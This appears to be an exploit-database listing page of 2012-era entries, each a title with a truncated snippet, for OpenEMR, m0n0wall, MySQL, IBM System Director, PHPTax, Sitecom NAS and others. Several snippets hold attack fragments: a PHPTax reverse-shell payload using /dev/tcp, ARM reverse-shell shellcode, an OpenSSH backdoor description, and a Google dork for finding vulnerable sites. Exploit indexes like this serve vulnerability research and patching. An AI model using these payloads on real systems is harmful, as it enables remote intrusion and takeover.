OpenEMR 4.1.1 - ofc_upload_image.php Arbitrary File Upload

OpenEMR 4.1.1 - ofcuploadimage.php Arbitrary File Upload ?php / OpenEMR 4.1.1 ofcuploadimage.php Arbitrary File Upload Vulnerability Vendor: OpenEMR Product web page: http://www.open-emr.org Affected version: 4.1.1 Summary: OpenEMR is a Free and Open Source electronic health records and medical...

Astium VoIP PBX 2.1 build 25399 - Multiple Vulnerabilities/Remote Command Execution

!/usr/bin/python +--------------------------------------------------------------------------------------------------------------------------------+ Exploit Title : Astium VoIP PBX 0x90.nl Software link :...

Astium VoIP PBX 2.1 Remote Root

!/usr/bin/python +--------------------------------------------------------------------------------------------------------------------------------+ Exploit Title : Astium VoIP PBX 0x90.nl Software link :...

m0n0wall 1.33 - Multiple Cross-Site Request Forgery Vulnerabilities

Exploit Title: m0n0wall 1.33 CSRF Remote root Access Date: 30/11/2012 Author: Yann CAM @ Synetis Vendor or Software Link: m0n0.ch - m0n0.ch/wall/downloads.php Version: 1.33 Category: CSRF Remote root Access Google dork: Tested on: FreeBSD m0n0wall firewall/router distribution description :...

m0n0wall 1.33 Cross Site Request Forgery Vulnerability

m0n0wall version 1.33 suffers from a cross site request forgery vulnerability that can allow for remote root access to the system. Exploit Title: m0n0wall 1.33 CSRF Remote root Access Date: 30/11/2012 Author: Yann CAM @ Synetis Vendor or Software Link: m0n0.ch - m0n0.ch/wall/downloads.php Version...

IBM System Director Agent - Remote System Level

IBM System Director Agent - Remote System Level IBM System Director Remote System Level Exploit CVE-2009-0880 extended zeroday Copyright C 2012 Kingcope IBM System Director has the port 6988 open. By using a special request to a vulnerable server, the attacker can force to load a dll remotely fro...

MySQL 5.1/5.5 (Windows) - 'MySQLJackpot' Remote Command Execution

FARLiGHT ELiTE HACKERS LEGACY R3L3ASE Attached is the MySQL Windows Remote Exploit post-auth, udf technique including the previously released mass scanner. The exploit is mirrored at the farlight website http://www.farlight.org. Oracle MySQL on Windows Remote SYSTEM Level Exploit zeroday All owne...

MySQL 5.15.5 (Windows) - MySQLJackpot Remote Command Execution

MySQL 5.15.5 Windows - MySQLJackpot Remote Command Execution FARLiGHT ELiTE HACKERS LEGACY R3L3ASE Attached is the MySQL Windows Remote Exploit post-auth, udf technique including the previously released mass scanner. The exploit is mirrored at the farlight website http://www.farlight.org. Oracle...

IBM System Director Agent - Remote System Level

IBM System Director Remote System Level Exploit CVE-2009-0880 extended zeroday Copyright C 2012 Kingcope IBM System Director has the port 6988 open. By using a special request to a vulnerable server, the attacker can force to load a dll remotely from a WebDAV share. The following exploit will loa...

IBM System Director Remote System Level Exploit

Exploit for windows platform in category remote exploits IBM System Director Remote System Level Exploit CVE-2009-0880 extended zeroday Copyright C 2012 Kingcope IBM System Director has the port 6988 open. By using a special request to a vulnerable server, the attacker can force to load a dll...

OpenSSH 6.0p1 Backdoor Patch 1.2 Vulnerability 0day

This patch is for openssh-6.0p1 source which combines a known openssh backdoor and Sebastian Krahmer's openssh.reverse capabilities. Telnet to target openssh server and issue udcgamaimagic string for getting reverse openssh connection. $id: udc-hackssh-v3bajaulaut-v1, 2012/10/28 05:00:50 slash...

ClanSphere 2011.3 - 'cs_lang' Cookie Local File Inclusion

Exploit Title: ClanSphere 2011.3 cslang cookie parameter Local File Include Vulnerability Google Dork: "Copyright 2012 Seitentitel. All rights reserved." || inurl:index.php?mod=clansphere Date: 10/22/2012 Author: Marco Tulio blkhtc0rp Vendor Homepage: http://www.csphere.eu Version: 2011.3 Tested...

PHPTax 0.8 Remote Code Execution

!/usr/bin/env python PHPtax 0.8 " print "Where payload is http://whatever.com/phptax - path to PHPtax with NO trailing /" sys.exit1 banner target = sys.argv1 reverseip = sys.argv2 reverseport = sys.argv3 payload = '%2Fbin%2Fbash%20%3E%26%20%2Fdev%2Ftcp%2F'+reverseip+'%2F'+reverseport+'%200%3E%261...

Sitecom MD-25x Multiple Vulnerabilities Reverse Root Shell Exploit

Exploit for windows platform in category remote exploits !/usr/bin/python Exploit Title: Sitecom MD-253 and MD-254 Network Storage Reverse Shell Exploit Date: 09/11/12 Exploit Author: Mattijs van Ommeren mattijs at alcyon dot nl Vendor Homepage: http://www.sitecom.com Software Link:...

Sitecom MD-25x - Multiple Vulnerabilities

Sitecom MD-25x - Multiple Vulnerabilities !/usr/bin/python Exploit Title: Sitecom MD-253 and MD-254 Network Storage Reverse Shell Exploit Date: 09/11/12 Exploit Author: Mattijs van Ommeren mattijs at alcyon dot nl Vendor Homepage: http://www.sitecom.com Software Link:...

Sitecom MD-25x Reverse Root Shell

!/usr/bin/python Exploit Title: Sitecom MD-253 and MD-254 Network Storage Reverse Shell Exploit Date: 09/11/12 Exploit Author: Mattijs van Ommeren mattijs at alcyon dot nl Vendor Homepage: http://www.sitecom.com Software Link: http://www.sitecom.com/download/5012/SitecomNas.2.4.17.bin Version:...

Sitecom MD-25x - Multiple Vulnerabilities

!/usr/bin/python Exploit Title: Sitecom MD-253 and MD-254 Network Storage Reverse Shell Exploit Date: 09/11/12 Exploit Author: Mattijs van Ommeren mattijs at alcyon dot nl Vendor Homepage: http://www.sitecom.com Software Link: http://www.sitecom.com/download/5012/SitecomNas.2.4.17.bin Version:...

Raspberry Pi Linux/ARM - reverse_shelltcp,10.1.1.2,0x1337

Raspberry Pi Linux/ARM - reverseshelltcp,10.1.1.2,0x1337. Shellcode exploit for arm platform / Title: Linux/ARM - reverseshelltcp,10.1.1.2,0x1337 execve"/bin/sh", 0, 0 vars - 72 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l - Raspberry Pi Author: midnitesnake 00008054 : 8054: e28f1001 add r1...

linux/ARM - reverse_shell(tcp,10.1.1.2,0x1337) execve("/bin/sh", [0], [0 vars]) - 72 bytes

/ Title: Linux/ARM - reverseshelltcp,10.1.1.2,0x1337 execve"/bin/sh", 0, 0 vars - 72 bytes Date: 2012-09-08 Tested on: ARM1176JZF-S v6l - Raspberry Pi Author: midnitesnake 00008054 : 8054: e28f1001 add r1, pc, 1 8058: e12fff11 bx r1 805c: 2002 movs r0, 2 805e: 2101 movs r1, 1 8060: 1a92 subs r2,...

Symantec Web Gateway 5.0.3.18 LFI Remote ROOT RCE Exploit

Exploit for linux platform in category remote exploits !/usr/bin/python ''' The original patch for the Symantec Web Gateway 5.0.2 LFI vulnerability removed the /tmp/networkScript file but left the entry in /etc/sudoers, allowing us to simply recreate the file and obtain a root shell using a...